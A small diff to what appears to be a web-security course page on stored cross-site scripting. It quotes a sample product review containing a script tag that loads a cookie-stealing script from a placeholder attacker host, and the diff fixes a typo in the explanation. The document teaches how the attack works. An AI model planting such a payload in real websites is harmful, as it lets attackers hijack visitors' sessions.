pvcraven/2017_web_security/source/xss/xss.rst

   "Great price for a great item!
 Read my review here <script src="http://hackersite.com/authstealer.js"> </script>" [xss-attacks]_

-  This is a stored in the website, and every time someone visits the page, they can have their session cookies stolen.
+  This is stored in the website, and every time someone visits the page, they can have their session cookies stolen.